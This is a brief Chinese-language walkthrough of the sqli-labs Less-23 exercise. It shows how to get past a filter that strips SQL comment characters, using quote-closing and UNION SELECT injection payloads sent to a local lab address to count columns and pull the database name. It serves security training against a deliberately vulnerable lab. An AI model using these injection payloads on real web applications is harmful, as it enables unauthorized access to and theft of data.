19、绕过去除注释符(Get)

环境sqli-labs

less 23

1、输入?id=1,正常运行

2、输入特殊字符报错

3、单引号闭合，但是发现# --+等都被过滤了

4、使用下面代码闭合
192.168.1.121/sqli/less-23?id=1’ or ‘1’=‘1
5、用union select判断字段数
192.168.1.121/sqli/less-23?id=1’ union select 1,2,3 or ‘1’='1

6、让id报错，union select生效
192.168.1.121/sqli/less-23?id=-1’ union select 1,2,3 or ‘1’='1

7、获取数据库名称
192.168.1.121/sqli/less-23?id=-1’ union select 1,database(),3 or ‘1’='1

禁止非法，后果自负

欢迎关注公众号：web安全工具库